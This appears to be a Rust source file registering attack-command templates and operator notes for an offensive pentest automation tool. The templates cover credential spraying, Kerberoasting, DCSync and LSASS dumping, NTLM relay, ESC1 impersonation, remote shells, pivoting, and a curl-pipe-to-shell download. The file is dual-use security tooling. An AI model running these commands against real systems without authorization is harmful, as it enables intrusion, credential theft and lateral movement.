//! The tool registry. Add entries here to teach shrike a new technique.
//!
//! Every command uses `{placeholder}` slots resolved from the engagement state.
//! Unfilled slots are prompted for interactively rather than silently guessed.

use super::{Applies, Speed, Tool, Yields::*};
use crate::model::Phase::*;

/// Baseline preconditions; entries override only what they need.
const AP: Applies = Applies {
    any_port: &[],
    service_like: None,
    banner_like: None,
    needs_cred: false,
    needs_domain: false,
    needs_dc: false,
    needs_compromised: false,
    needs_hashes: false,
    windows_only: false,
    linux_only: false,
    global: false,
};

macro_rules! tool {
    ($id:literal, $name:literal, [$($bin:literal),+], $phase:expr, $speed:expr,
     $applies:expr, $tpl:literal, $desc:literal, $note:literal,
     yields: [$($y:expr),*], weight: $w:literal $(, interactive: $i:literal)?) => {
        Tool {
            id: $id, name: $name, bins: &[$($bin),+], phase: $phase, desc: $desc,
            template: $tpl, speed: $speed, interactive: false $(|| $i)?,
            yields: &[$($y),*], applies: $applies, note: $note, weight: $w,
        }
    };
}

pub static REGISTRY: &[Tool] = &[
    // ───────────────────────────── discovery / port scanning
    tool!("nmap-ping", "nmap host discovery", ["nmap"], Discovery, Speed::Fast,
        Applies { global: true, ..AP },
        "nmap -sn {subnet} -oX {outfile}",
        "Sweep a subnet for live hosts",
        "No port scan — just find what is alive. Run this first on any new segment.",
        yields: [Hosts], weight: 90),
    tool!("nmap-quick", "nmap top-1000 + versions", ["nmap"], PortScan, Speed::Medium,
        Applies { global: true, ..AP },
        "nmap -sCV -Pn -T4 {target} -oX {outfile}",
        "Default scripts + version detection on the top 1000 ports",
        "Fast first look. Always follow with a full -p- sweep — filtered hosts hide ports.",
        yields: [Ports, Services], weight: 88),
    tool!("nmap-full", "nmap all 65535 ports", ["nmap"], PortScan, Speed::Slow,
        Applies { global: true, ..AP },
        "nmap -p- --min-rate 2000 -Pn -T4 {target} -oX {outfile}",
        "Full TCP port sweep",
        "The single highest-value scan. Non-standard ports are where the third-party \
         software with a public exploit lives — a top-1000 scan will never see them.",
        yields: [Ports], weight: 95),
    tool!("nmap-udp", "nmap top UDP ports", ["nmap"], PortScan, Speed::Slow,
        Applies { global: true, ..AP },
        "nmap -sU --top-ports 100 -Pn {target} -oX {outfile}",
        "UDP scan of the 100 most common ports",
        "SNMP (161), TFTP (69) and IKE (500) are routinely missed because nobody scans UDP.",
        yields: [Ports], weight: 40),
    tool!("nmap-vuln", "nmap vuln scripts", ["nmap"], VulnScan, Speed::Slow,
        Applies { global: true, ..AP },
        "nmap --script vuln -Pn {target} -oX {outfile}",
        "Run the NSE vuln category",
        "Noisy and false-positive prone, but catches the obvious unpatched cases.",
        yields: [Vulns], weight: 50),
    tool!("rustscan", "rustscan", ["rustscan"], PortScan, Speed::Fast,
        Applies { global: true, ..AP },
        "rustscan -a {target} --ulimit 5000 -- -sCV",
        "Very fast full-port sweep, pipes into nmap for versions",
        "Much faster than nmap -p- when the network tolerates the packet rate.",
        yields: [Ports, Services], weight: 85),
    tool!("masscan", "masscan", ["masscan"], PortScan, Speed::Fast,
        Applies { global: true, ..AP },
        "masscan {subnet} -p1-65535 --rate 10000 -oJ {outfile}",
        "Internet-scale SYN scanner",
        "Use for wide subnet sweeps, then re-scan the hits with nmap -sCV for detail.",
        yields: [Hosts, Ports], weight: 60),
    // ───────────────────────────── web enumeration
    tool!("whatweb", "whatweb", ["whatweb"], WebEnum, Speed::Fast,
        Applies { service_like: Some("http"), ..AP },
        "whatweb -a3 {url}",
        "Fingerprint the web stack",
        "Identifies CMS, framework and version — feeds directly into searchsploit.",
        yields: [Vulns], weight: 80),
    tool!("httpx", "httpx probe", ["httpx"], WebEnum, Speed::Fast,
        Applies { service_like: Some("http"), ..AP },
        "httpx -u {url} -title -tech-detect -status-code -follow-redirects -json -o {outfile}",
        "Probe and fingerprint HTTP services",
        "Resolves http vs https automatically and reports the real title and tech stack.",
        yields: [Vulns], weight: 78),
    tool!("nuclei", "nuclei", ["nuclei"], VulnScan, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "nuclei -u {url} -severity critical,high,medium -jsonl -o {outfile}",
        "Template-driven vulnerability scanner",
        "Highest signal-to-noise web scanner available. Keep templates updated.",
        yields: [Vulns], weight: 82),
    tool!("feroxbuster", "feroxbuster", ["feroxbuster"], DirEnum, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "feroxbuster -u {url} -w {wordlist} -x php,txt,html,bak,zip,db,old -d 2 -k --json -o {outfile}",
        "Recursive content discovery",
        "Recursion is what finds /database/, /backup/ and /logs/ — the directories that \
         hold the credentials.",
        yields: [WebPaths], weight: 88),
    tool!("ffuf-dir", "ffuf directory fuzz", ["ffuf"], DirEnum, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "ffuf -u {url}/FUZZ -w {wordlist} -mc all -fc 404 -o {outfile} -of json",
        "Fuzz for directories and files",
        "Tune -fs/-fw to filter the soft-404 size once you see the baseline response.",
        yields: [WebPaths], weight: 84),
    tool!("ffuf-vhost", "ffuf vhost fuzz", ["ffuf"], WebEnum, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "ffuf -u {url} -H 'Host: FUZZ.{domain}' -w {vhostlist} -mc all -fs 0 -o {outfile} -of json",
        "Discover virtual hosts",
        "Different vhosts on the same IP are effectively different applications.",
        yields: [Vhosts], weight: 70),
    tool!("gobuster-dns", "gobuster DNS", ["gobuster"], WebEnum, Speed::Medium,
        Applies { needs_domain: true, global: true, ..AP },
        "gobuster dns -d {domain} -w {vhostlist} -o {outfile}",
        "Brute-force subdomains",
        "",
        yields: [Hosts], weight: 55),
    tool!("katana", "katana crawler", ["katana"], WebEnum, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "katana -u {url} -jc -kf all -d 3 -o {outfile}",
        "Crawl the application for endpoints and JS-referenced routes",
        "JavaScript files leak API routes and parameter names that no wordlist contains.",
        yields: [WebPaths], weight: 72),
    tool!("nikto", "nikto", ["nikto"], VulnScan, Speed::Slow,
        Applies { service_like: Some("http"), ..AP },
        "nikto -h {url} -o {outfile} -Format txt",
        "Classic web server misconfiguration scanner",
        "Dated and noisy, but still finds exposed backup files and dangerous methods.",
        yields: [Vulns], weight: 45),
    tool!("wpscan", "wpscan", ["wpscan"], VulnScan, Speed::Medium,
        Applies { banner_like: Some("wordpress"), ..AP },
        "wpscan --url {url} --enumerate u,vp,vt --random-user-agent -o {outfile}",
        "WordPress-specific enumeration",
        "Enumerates users for password attacks and vulnerable plugins for direct RCE.",
        yields: [Users, Vulns], weight: 80),
    tool!("sqlmap", "sqlmap", ["sqlmap"], Exploit, Speed::Slow,
        Applies { service_like: Some("http"), ..AP },
        "sqlmap -u '{url}' --batch --level 2 --risk 2 --output-dir {outdir}",
        "Automated SQL injection detection and exploitation",
        "Use --forms or -r request.txt for authenticated endpoints. --os-shell when injectable.",
        yields: [Credentials, Shell], weight: 68),
    tool!("wafw00f", "wafw00f", ["wafw00f"], WebEnum, Speed::Fast,
        Applies { service_like: Some("http"), ..AP },
        "wafw00f {url}",
        "Detect a WAF in front of the application",
        "Knowing the WAF up front saves you from burning the target with blocked payloads.",
        yields: [Vulns], weight: 40),
    // ───────────────────────────── API
    tool!("ffuf-api", "ffuf API routes", ["ffuf"], ApiEnum, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "ffuf -u {url}/FUZZ -w {apilist} -mc all -fc 404 -H 'Content-Type: application/json' -o {outfile} -of json",
        "Fuzz for API endpoints",
        "",
        yields: [WebPaths], weight: 60),
    tool!("arjun", "arjun", ["arjun"], ApiEnum, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "arjun -u {url} -oJ {outfile}",
        "Discover hidden HTTP parameters",
        "Hidden params are where LFI and IDOR live — ?file=, ?page=, ?id=.",
        yields: [WebPaths], weight: 62),
    // ───────────────────────────── SMB / network services
    tool!("nxc-smb-null", "netexec SMB null session", ["nxc", "netexec", "crackmapexec"],
        SmbEnum, Speed::Fast,
        Applies { any_port: &[445, 139], ..AP },
        "nxc smb {ip} -u '' -p '' --shares --users --pass-pol",
        "Try an unauthenticated SMB session",
        "A null or guest session frequently leaks the full user list, which is all you \
         need to start AS-REP roasting.",
        yields: [Users, Shares, DomainInfo], weight: 92),
    tool!("nxc-smb-guest", "netexec SMB guest", ["nxc", "netexec"], SmbEnum, Speed::Fast,
        Applies { any_port: &[445], ..AP },
        "nxc smb {ip} -u 'guest' -p '' --shares",
        "Try the guest account",
        "Guest is often left enabled when null sessions are blocked.",
        yields: [Shares], weight: 86),
    tool!("nxc-smb-auth", "netexec SMB (authenticated)", ["nxc", "netexec"], SmbEnum, Speed::Fast,
        Applies { any_port: &[445], needs_cred: true, ..AP },
        "nxc smb {ip} -u '{user}' -p '{pass}' -d {domain} --shares --users --pass-pol",
        "Authenticated SMB enumeration",
        "Watch for (Pwn3d!) in the output — that means local admin and a direct path to SYSTEM.",
        yields: [Shares, Users], weight: 90),
    tool!("nxc-spray", "netexec credential spray", ["nxc", "netexec"], CredAccess, Speed::Medium,
        Applies { needs_cred: true, global: true, ..AP },
        "nxc smb {subnet} -u '{user}' -p '{pass}' -d {domain} --continue-on-success",
        "Spray one credential across a whole subnet",
        "Password reuse is the single most reliable lateral-movement path. Spray every \
         credential across every host the moment you recover it.",
        yields: [Session], weight: 94),
    tool!("smbclient-list", "smbclient share list", ["smbclient"], SmbEnum, Speed::Fast,
        Applies { any_port: &[445, 139], ..AP },
        "smbclient -N -L //{ip}/",
        "List shares anonymously",
        "",
        yields: [Shares], weight: 80),
    tool!("smbmap", "smbmap recursive", ["smbmap"], SmbEnum, Speed::Medium,
        Applies { any_port: &[445], needs_cred: true, ..AP },
        "smbmap -H {ip} -u '{user}' -p '{pass}' -d {domain} -R",
        "Recursively list share contents with permissions",
        "Shows READ/WRITE per share. A writable share is a payload drop or a coerced-auth trigger.",
        yields: [Files, Shares], weight: 82),
    tool!("enum4linux-ng", "enum4linux-ng", ["enum4linux-ng", "enum4linux"], SmbEnum, Speed::Medium,
        Applies { any_port: &[445, 139], ..AP },
        "enum4linux-ng -A {ip} -oJ {outfile}",
        "Broad SMB/RPC/LDAP enumeration sweep",
        "One command that pulls users, groups, shares, password policy and OS info.",
        yields: [Users, Shares, DomainInfo], weight: 84),
    tool!("rpcclient-users", "rpcclient enumdomusers", ["rpcclient"], SmbEnum, Speed::Fast,
        Applies { any_port: &[135, 139, 445], ..AP },
        "rpcclient -U '' -N {ip} -c 'enumdomusers;enumdomgroups;querydispinfo'",
        "Enumerate domain users over RPC",
        "Works even when SMB share listing is denied.",
        yields: [Users], weight: 78),
    tool!("showmount", "showmount NFS exports", ["showmount"], SmbEnum, Speed::Fast,
        Applies { any_port: &[2049, 111], ..AP },
        "showmount -e {ip}",
        "List NFS exports",
        "An export with no_root_squash lets you drop a SUID binary and become root.",
        yields: [Shares], weight: 74),
    tool!("snmpwalk", "snmpwalk (public)", ["snmpwalk"], ServiceEnum, Speed::Medium,
        Applies { any_port: &[161], ..AP },
        "snmpwalk -v2c -c public {ip} 1.3.6.1.2.1.25.4.2.1.2",
        "Walk the running-process table over SNMP",
        "Process arguments frequently contain plaintext passwords.",
        yields: [Credentials, Users], weight: 76),
    // ───────────────────────────── Active Directory enumeration
    tool!("ntpdate", "sync clock to DC", ["ntpdate", "sntp", "rdate"], AdEnum, Speed::Fast,
        Applies { needs_dc: true, global: true, ..AP },
        "ntpdate -u {dc_ip}",
        "Synchronise local clock with the domain controller",
        "Kerberos rejects any request with more than 5 minutes of clock skew. When \
         impacket returns KRB_AP_ERR_SKEW, this is the fix — run it before anything Kerberos.",
        yields: [], weight: 99),
    tool!("bloodhound-py", "bloodhound-python", ["bloodhound-python", "bloodhound.py"],
        AdEnum, Speed::Medium,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "bloodhound-python -d {domain} -u '{user}' -p '{pass}' -ns {dc_ip} -c All --zip",
        "Collect the full AD graph for BloodHound",
        "Do not guess at the attack path — collect the graph and let it tell you. Run \
         this the moment you hold any valid domain credential.",
        yields: [DomainInfo, Users], weight: 96),
    tool!("nxc-ldap", "netexec LDAP enum", ["nxc", "netexec"], AdEnum, Speed::Fast,
        Applies { any_port: &[389, 636, 3268], needs_cred: true, ..AP },
        "nxc ldap {ip} -u '{user}' -p '{pass}' -d {domain} --users --groups --password-not-required --trusted-for-delegation",
        "LDAP enumeration of users, groups and delegation",
        "--trusted-for-delegation surfaces unconstrained delegation hosts, a fast route to DA.",
        yields: [Users, DomainInfo], weight: 88),
    tool!("ldapsearch-anon", "ldapsearch (anonymous)", ["ldapsearch"], AdEnum, Speed::Fast,
        Applies { any_port: &[389], ..AP },
        "ldapsearch -x -H ldap://{ip} -s base namingcontexts",
        "Anonymous LDAP base query",
        "Reveals the naming context (domain DN) with no credentials at all.",
        yields: [DomainInfo], weight: 82),
    tool!("certipy-find", "certipy find (ADCS)", ["certipy-ad", "certipy"], AdEnum, Speed::Medium,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "certipy-ad find -u '{upn}' -p '{pass}' -dc-ip {dc_ip} -vulnerable -stdout",
        "Enumerate AD Certificate Services for ESC1-ESC13",
        "ADCS misconfigurations are the most reliable modern path to Domain Admin. \
         ESC1 alone turns any domain user into DA.",
        yields: [Vulns, DomainInfo], weight: 93),
    tool!("getaduser", "impacket GetADUsers", ["impacket-GetADUsers", "GetADUsers.py"],
        AdEnum, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "impacket-GetADUsers -all {domain}/'{user}':'{pass}' -dc-ip {dc_ip}",
        "List all domain users with last-logon data",
        "",
        yields: [Users], weight: 80),
    // ───────────────────────────── AD attacks
    tool!("asreproast", "AS-REP roast", ["impacket-GetNPUsers", "GetNPUsers.py"],
        CredAccess, Speed::Fast,
        Applies { needs_dc: true, global: true, ..AP },
        "impacket-GetNPUsers {domain}/ -usersfile {userlist} -dc-ip {dc_ip} -no-pass -format hashcat -outputfile {outfile}",
        "Request AS-REP hashes for pre-auth-disabled accounts",
        "Needs NO credentials — only a username list. Always try this first against a \
         domain you have no foothold in. Crack with hashcat -m 18200.",
        yields: [Hashes], weight: 95),
    tool!("kerberoast", "Kerberoast", ["impacket-GetUserSPNs", "GetUserSPNs.py"],
        CredAccess, Speed::Fast,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "impacket-GetUserSPNs -request -dc-ip {dc_ip} {domain}/'{user}':'{pass}' -outputfile {outfile}",
        "Request TGS hashes for every SPN-bearing account",
        "Any valid domain user can do this. Service accounts often have weak, \
         never-rotated passwords. Crack with hashcat -m 13100.",
        yields: [Hashes], weight: 94),
    tool!("secretsdump", "impacket secretsdump", ["impacket-secretsdump", "secretsdump.py"],
        CredAccess, Speed::Medium,
        Applies { needs_cred: true, any_port: &[445], ..AP },
        "impacket-secretsdump {domain}/'{user}':'{pass}'@{ip} -outputfile {outfile}",
        "Dump SAM, LSA secrets and (on a DC) the whole NTDS via DCSync",
        "Against a DC with DCSync rights this dumps every hash in the domain, including \
         krbtgt — which is game over.",
        yields: [Hashes, Credentials], weight: 96),
    tool!("psexec", "impacket psexec", ["impacket-psexec", "psexec.py"], Exploit, Speed::Fast,
        Applies { needs_cred: true, any_port: &[445], ..AP },
        "impacket-psexec {domain}/'{user}':'{pass}'@{ip}",
        "SYSTEM shell over SMB (creates a service)",
        "Loud — it drops a binary and creates a service. Prefer wmiexec for stealth.",
        yields: [Shell], weight: 84, interactive: true),
    tool!("wmiexec", "impacket wmiexec", ["impacket-wmiexec", "wmiexec.py"], Exploit, Speed::Fast,
        Applies { needs_cred: true, any_port: &[135], ..AP },
        "impacket-wmiexec {domain}/'{user}':'{pass}'@{ip}",
        "Semi-interactive shell over WMI",
        "Quieter than psexec — no service creation, no binary on disk.",
        yields: [Shell], weight: 86, interactive: true),
    tool!("evil-winrm", "evil-winrm", ["evil-winrm"], Exploit, Speed::Fast,
        Applies { needs_cred: true, any_port: &[5985, 5986], ..AP },
        "evil-winrm -i {ip} -u '{user}' -p '{pass}'",
        "Interactive PowerShell over WinRM",
        "Accepts -H <nthash> for pass-the-hash. Requires Remote Management Users or local admin.",
        yields: [Shell], weight: 90, interactive: true),
    tool!("nxc-winrm", "netexec WinRM check", ["nxc", "netexec"], Exploit, Speed::Fast,
        Applies { any_port: &[5985, 5986], needs_cred: true, ..AP },
        "nxc winrm {ip} -u '{user}' -p '{pass}' -d {domain}",
        "Test WinRM access before committing to a shell",
        "",
        yields: [Session], weight: 88),
    tool!("ntlmrelayx", "impacket ntlmrelayx", ["impacket-ntlmrelayx", "ntlmrelayx.py"],
        CredAccess, Speed::VerySlow,
        Applies { global: true, ..AP },
        "impacket-ntlmrelayx -tf {relaylist} -smb2support -socks",
        "Relay incoming NTLM authentications to other hosts",
        "Only works against targets with SMB signing NOT required. Pair with responder \
         or a coerced auth (PetitPotam / PrinterBug) to force the authentication.",
        yields: [Session, Hashes], weight: 78),
    tool!("responder", "Responder", ["responder", "Responder.py"], CredAccess, Speed::VerySlow,
        Applies { global: true, ..AP },
        "responder -I {iface} -dwv",
        "Poison LLMNR/NBT-NS/MDNS to capture NetNTLMv2 hashes",
        "Extremely effective on real internal networks. Crack captures with hashcat -m 5600.",
        yields: [Hashes], weight: 76),
    tool!("mssqlclient", "impacket mssqlclient", ["impacket-mssqlclient", "mssqlclient.py"],
        Exploit, Speed::Fast,
        Applies { any_port: &[1433], needs_cred: true, ..AP },
        "impacket-mssqlclient {domain}/'{user}':'{pass}'@{ip} -windows-auth",
        "Interactive MSSQL client",
        "Then: enable_xp_cmdshell, xp_cmdshell whoami, enum_links, enum_impersonate. \
         Linked servers frequently bridge into otherwise unreachable hosts.",
        yields: [Shell], weight: 84, interactive: true),
    // ───────────────────────────── cracking
    tool!("hashcat-ntlm", "hashcat NTLM (m1000)", ["hashcat"], Cracking, Speed::Slow,
        Applies { needs_hashes: true, global: true, ..AP },
        "hashcat -m 1000 {hashfile} {passlist} -O --status",
        "Crack NTLM hashes",
        "",
        yields: [Credentials], weight: 70),
    tool!("hashcat-asrep", "hashcat AS-REP (m18200)", ["hashcat"], Cracking, Speed::Slow,
        Applies { needs_hashes: true, global: true, ..AP },
        "hashcat -m 18200 {hashfile} {passlist} -O --status",
        "Crack AS-REP roast output",
        "",
        yields: [Credentials], weight: 88),
    tool!("hashcat-tgs", "hashcat TGS-REP (m13100)", ["hashcat"], Cracking, Speed::Slow,
        Applies { needs_hashes: true, global: true, ..AP },
        "hashcat -m 13100 {hashfile} {passlist} -O --status",
        "Crack Kerberoast output",
        "",
        yields: [Credentials], weight: 88),
    tool!("hashcat-netntlmv2", "hashcat NetNTLMv2 (m5600)", ["hashcat"], Cracking, Speed::Slow,
        Applies { needs_hashes: true, global: true, ..AP },
        "hashcat -m 5600 {hashfile} {passlist} -O --status",
        "Crack Responder captures",
        "",
        yields: [Credentials], weight: 86),
    tool!("john", "john the ripper", ["john"], Cracking, Speed::Slow,
        Applies { needs_hashes: true, global: true, ..AP },
        "john --wordlist={passlist} {hashfile}",
        "Crack hashes with John",
        "Handy for formats hashcat lacks, and for *2john helper converters.",
        yields: [Credentials], weight: 60),
    tool!("hashid", "name-that-hash", ["nth", "name-that-hash", "hashid"], Cracking, Speed::Fast,
        Applies { global: true, ..AP },
        "nth -f {hashfile}",
        "Identify an unknown hash format",
        "",
        yields: [], weight: 50),
    // ───────────────────────────── pivoting
    tool!("ligolo-proxy", "ligolo-ng proxy (operator side)", ["ligolo-proxy"], Pivot, Speed::VerySlow,
        Applies { global: true, ..AP },
        "ligolo-proxy -selfcert -laddr 0.0.0.0:11601",
        "Start the ligolo-ng listener on your box",
        "The cleanest pivot available: gives you a real TUN interface, so every tool \
         works natively with no proxychains. Then: ip tuntap add user root mode tun ligolo && \
         ip link set ligolo up && ip route add <target-subnet> dev ligolo",
        yields: [Tunnel], weight: 92, interactive: true),
    tool!("chisel-server", "chisel server (operator side)", ["chisel"], Pivot, Speed::VerySlow,
        Applies { global: true, ..AP },
        "chisel server -p 8080 --reverse",
        "Start a chisel reverse-tunnel server",
        "Agent side: chisel client <you>:8080 R:socks — then point proxychains at 127.0.0.1:1080.",
        yields: [Tunnel], weight: 84),
    tool!("sshuttle", "sshuttle", ["sshuttle"], Pivot, Speed::VerySlow,
        Applies { needs_cred: true, global: true, ..AP },
        "sshuttle -r {user}@{ip} {subnet} --ssh-cmd 'ssh -o StrictHostKeyChecking=no'",
        "Transparent VPN-over-SSH into a subnet",
        "Easiest pivot when you have SSH credentials — no proxychains needed.",
        yields: [Tunnel], weight: 80),
    // ───────────────────────────── post-exploitation
    tool!("linpeas", "linPEAS", ["curl"], PrivEsc, Speed::Medium,
        Applies { needs_compromised: true, linux_only: true, ..AP },
        "curl -sL https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh",
        "Linux privilege-escalation enumeration",
        "Run it on the target. Read the red/yellow highlights first — those are the \
         confirmed findings.",
        yields: [Vulns], weight: 90),
    tool!("pspy", "pspy", ["pspy64"], PrivEsc, Speed::Medium,
        Applies { needs_compromised: true, linux_only: true, ..AP },
        "./pspy64 -pf -i 1000",
        "Watch processes without root to catch cron jobs",
        "Reveals root cron jobs running writable scripts — a very common privesc.",
        yields: [Vulns], weight: 82),
    tool!("winpeas", "winPEAS", ["curl"], PrivEsc, Speed::Medium,
        Applies { needs_compromised: true, windows_only: true, ..AP },
        ".\\winPEASx64.exe",
        "Windows privilege-escalation enumeration",
        "",
        yields: [Vulns], weight: 90),
    tool!("pypykatz", "pypykatz (offline LSASS)", ["pypykatz"], CredAccess, Speed::Fast,
        Applies { global: true, ..AP },
        "pypykatz lsa minidump {dumpfile}",
        "Parse an LSASS dump offline",
        "Dump on target with procdump/comsvcs, then parse here — no AV interference on \
         your own box.",
        yields: [Credentials, Hashes], weight: 92),
    tool!("nxc-lsassy", "netexec lsassy", ["nxc", "netexec"], CredAccess, Speed::Medium,
        Applies { any_port: &[445], needs_cred: true, ..AP },
        "nxc smb {ip} -u '{user}' -p '{pass}' -d {domain} -M lsassy",
        "Remotely dump LSASS where you have local admin",
        "Requires (Pwn3d!). Yields the cached credentials of every logged-on user.",
        yields: [Credentials, Hashes], weight: 94),
    tool!("nxc-sam", "netexec SAM/LSA dump", ["nxc", "netexec"], CredAccess, Speed::Fast,
        Applies { any_port: &[445], needs_cred: true, ..AP },
        "nxc smb {ip} -u '{user}' -p '{pass}' -d {domain} --sam --lsa",
        "Dump local SAM and LSA secrets",
        "The local Administrator hash is often reused across every workstation in the estate.",
        yields: [Hashes, Credentials], weight: 92),
    // ───────────────────────────── utility
    tool!("searchsploit", "searchsploit", ["searchsploit"], VulnScan, Speed::Fast,
        Applies { global: true, ..AP },
        "searchsploit {query}",
        "Search the exploit-db mirror",
        "Feed it the exact product and version string from the service banner.",
        yields: [Vulns], weight: 74),
    tool!("ftp-anon", "anonymous FTP mirror", ["wget"], Loot, Speed::Medium,
        Applies { any_port: &[21], ..AP },
        "wget -m --no-passive ftp://anonymous:anonymous@{ip}/ -P {outdir}",
        "Mirror an anonymous FTP root",
        "Pull everything, then grep the lot for credentials. Documents and .bak files \
         are where passwords hide.",
        yields: [Files, Credentials], weight: 88),
    // ═══════════════════════════ EXPANSION (research/TOOLS_EXPANSION.md) ═══════════════════════════

    // ─── OSINT / subdomain / recon ───
    tool!("subfinder", "subfinder", ["subfinder"], Discovery, Speed::Fast,
        Applies { needs_domain: true, global: true, ..AP },
        "subfinder -d {domain} -all -silent -oJ -o {outfile}",
        "Passive subdomain enumeration",
        "Passive only. Add API keys in ~/.config/subfinder for depth. Feed results to httpx/dnsx.",
        yields: [Hosts], weight: 70),
    tool!("dnsx", "dnsx resolver", ["dnsx"], Discovery, Speed::Fast,
        Applies { needs_domain: true, global: true, ..AP },
        "dnsx -d {domain} -w {wordlist} -json -o {outfile}",
        "Resolve/brute DNS and filter wildcards",
        "Feed subfinder output via stdin (-l -). Great for wildcard filtering.",
        yields: [Hosts], weight: 60),
    tool!("gau", "getallurls", ["gau"], Discovery, Speed::Medium,
        Applies { needs_domain: true, global: true, ..AP },
        "gau --threads 5 --o {outfile} {domain}",
        "Historical URLs from Wayback/CommonCrawl/OTX",
        "Finds dead params and forgotten endpoints. Feed to httpx/dalfox.",
        yields: [WebPaths], weight: 55),
    tool!("dnsrecon", "DNSRecon", ["dnsrecon"], Discovery, Speed::Medium,
        Applies { needs_domain: true, global: true, ..AP },
        "dnsrecon -d {domain} -n {dc_ip} -t std,axfr -j {outfile}",
        "DNS records + zone-transfer attempt",
        "-t axfr attempts a zone transfer; -n pins the resolver (use the DC for AD).",
        yields: [Hosts], weight: 50),
    tool!("theharvester", "theHarvester", ["theHarvester", "theharvester"], Discovery, Speed::Slow,
        Applies { needs_domain: true, global: true, ..AP },
        "theHarvester -d {domain} -b all -f {outfile}",
        "Emails, hosts and employee names (spray lists)",
        "Some sources need API keys. Names become your username/spray list.",
        yields: [Users, Hosts], weight: 45),
    // ─── web enumeration / crawling ───
    tool!("dirsearch", "dirsearch", ["dirsearch"], DirEnum, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "dirsearch -u {url} -w {wordlist} --format=json -o {outfile}",
        "Content discovery with built-in reporting",
        "Recursive with -r; smart extension handling. Alternative to ffuf/feroxbuster.",
        yields: [WebPaths], weight: 72),
    tool!("gospider", "GoSpider", ["gospider"], WebEnum, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "gospider -s {url} -o {outdir} -c 10 -d 3",
        "Crawl + parse JS/robots/sitemap",
        "Pairs with dalfox for XSS. -d sets crawl depth.",
        yields: [WebPaths], weight: 66),
    tool!("dalfox", "Dalfox (XSS)", ["dalfox"], VulnScan, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "dalfox url {url} --format json -o {outfile}",
        "XSS scanner",
        "v3 uses 'dalfox scan {url}'; v2 uses 'dalfox url'. Pipe gau/gospider params via stdin.",
        yields: [Vulns], weight: 68),
    tool!("testssl", "testssl.sh", ["testssl.sh", "testssl"], ServiceEnum, Speed::Slow,
        Applies { service_like: Some("ssl"), ..AP },
        "testssl.sh --jsonfile {outfile} {url}",
        "Deep TLS/cipher/vulnerability audit",
        "Catches HEARTBLEED, ROBOT, weak ciphers, cert issues. Slow — run once per host:port.",
        yields: [Vulns], weight: 58),
    tool!("gowitness", "gowitness", ["gowitness"], WebEnum, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "gowitness scan single -u {url} --screenshot-path {outdir} --write-jsonl",
        "Headless-Chrome screenshots of web services",
        "v3 syntax: gowitness scan single/file/cidr/nmap. Eyeball many hosts fast.",
        yields: [WebPaths], weight: 54),
    tool!("x8", "x8 param discovery", ["x8"], ApiEnum, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "x8 -u {url} -w {wordlist} -O json -o {outfile}",
        "Hidden GET/POST parameter discovery",
        "Faster and more precise than arjun on large wordlists. Hidden params -> LFI/IDOR.",
        yields: [WebPaths], weight: 62),
    tool!("joomscan", "JoomScan", ["joomscan"], WebEnum, Speed::Medium,
        Applies { banner_like: Some("joomla"), ..AP },
        "joomscan --url {url}",
        "Joomla components/version/LFI scanner",
        "The WPScan for Joomla. Text output.",
        yields: [Vulns], weight: 60),
    tool!("droopescan", "droopescan", ["droopescan"], WebEnum, Speed::Medium,
        Applies { banner_like: Some("drupal"), ..AP },
        "droopescan scan drupal -u {url}",
        "Drupal/SilverStripe/Moodle CMS scanner",
        "",
        yields: [Vulns], weight: 58),
    // ─── AD attack (modern) ───
    tool!("kerbrute-userenum", "Kerbrute userenum", ["kerbrute"], AdEnum, Speed::Fast,
        Applies { needs_dc: true, global: true, ..AP },
        "kerbrute userenum -d {domain} --dc {dc_ip} {userlist} -o {outfile}",
        "Unauth username validation via Kerberos pre-auth",
        "No credentials needed, no lockouts, no failure logs. The best first AD step.",
        yields: [Users], weight: 90),
    tool!("kerbrute-spray", "Kerbrute passwordspray", ["kerbrute"], CredAccess, Speed::Fast,
        Applies { needs_dc: true, global: true, ..AP },
        "kerbrute passwordspray -d {domain} --dc {dc_ip} {userlist} '{pass}'",
        "Spray one password across many users",
        "WATCH the lockout policy — one spray per window. --safe aborts on the first lockout.",
        yields: [Credentials], weight: 82),
    tool!("cewl", "CeWL wordlist", ["cewl"], Cracking, Speed::Medium,
        Applies { service_like: Some("http"), ..AP },
        "cewl -d 3 -m 5 -w {outfile} {url}",
        "Build a target-specific wordlist from the site",
        "-d depth, -m min length. --with-numbers to seed mangling.",
        yields: [], weight: 40),
    tool!("targetedkerberoast", "targetedKerberoast", ["targetedKerberoast.py", "targetedKerberoast"],
        CredAccess, Speed::Medium,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "targetedKerberoast.py -d {domain} -u {user} -p '{pass}' --dc-ip {dc_ip} -o {hashfile}",
        "Roast users that have no SPN (via a temporary one)",
        "Needs GenericWrite over the targets. Sets a temp SPN, roasts, removes it. Crack -m 13100.",
        yields: [Hashes], weight: 78),
    tool!("certipy-req", "Certipy req (ESC1)", ["certipy-ad", "certipy"], Exploit, Speed::Medium,
        Applies { needs_cred: true, needs_dc: true, global: true, ..AP },
        "certipy-ad req -u {upn} -p '{pass}' -dc-ip {dc_ip} -target {ip} -ca CA_NAME -template TEMPLATE -upn administrator@{domain}",
        "Request a cert impersonating another user (ESC1)",
        "Fill CA_NAME/TEMPLATE from certipy-find. Newer Certipy also wants -sid of the target.",
        yields: [Credentials], weight: 80),
    tool!("certipy-auth", "Certipy auth (PKINIT)", ["certipy-ad", "certipy"], CredAccess, Speed::Fast,
        Applies { needs_dc: true, global: true, ..AP },
        "certipy-ad auth -pfx {outfile} -dc-ip {dc_ip}",
